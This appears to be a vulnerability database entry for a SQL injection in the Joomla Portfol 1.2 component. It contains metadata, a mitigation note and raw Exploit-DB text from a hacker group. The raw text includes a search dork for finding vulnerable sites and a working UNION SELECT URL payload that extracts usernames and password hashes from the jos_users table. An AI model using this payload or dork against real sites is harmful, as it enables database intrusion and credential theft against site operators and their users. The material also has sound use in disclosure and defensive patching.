Joomla Component Portfol SQL Injection Vulnerability

vendor:

Joomla Component Portfol

by:

H!tm@N

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Joomla Component Portfol

Affected Version From: 1.2

Affected Version To: 1.2

Patch Exists: YES

Related CWE: N/A

CPE: a:mivaco:joomla_component_portfol

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Joomla Component Portfol SQL Injection Vulnerability

A vulnerability exists in Joomla Component Portfol version 1.2, which allows an attacker to inject arbitrary SQL commands. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code in the 'vcatid' parameter in a 'viewcategory' action to the 'index.php' script. Successful exploitation may allow an attacker to gain access to the database and compromise the application and the underlying system.

Mitigation:

Upgrade to the latest version of Joomla Component Portfol.

Source

Exploit-DB raw data:

#############################################################################
#							                    #
#           Joomla Component Portfol SQL Injection Vulnerability            #
#							                    #
#############################################################################


########################################

[~] Vulnerability found by: H!tm@N
[~] Contact: khghitman[at]gmail[dot]com
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de - [-=Kosova Hackers Group=-]

########################################

[~] ScriptName:    "Joomla"
[~] Component:     "Portfol (com_portfol)"
[~] Version:       "1.2" 
[~] Date:          "20.10.2006"
[~] Author:        "mivaco"
[~] Author E-mail: "ivan@mivaco.com"
[~] Author URL:    "www.mivaco.com"

########################################

[~] DORK: inurl:"com_portfol" 

########################################

[~] Exploit: /index.php?option=com_portfol&Itemid=814&task=viewcategory&vcatid=[SQL]
[~] Example: /index.php?option=com_portfol&Itemid=814&task=viewcategory&vcatid=-96+union+select+concat(username,char(58),password)KHG+from+jos_users--

########################################

[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] United States of Albania

########################################

# milw0rm.com [2009-01-12]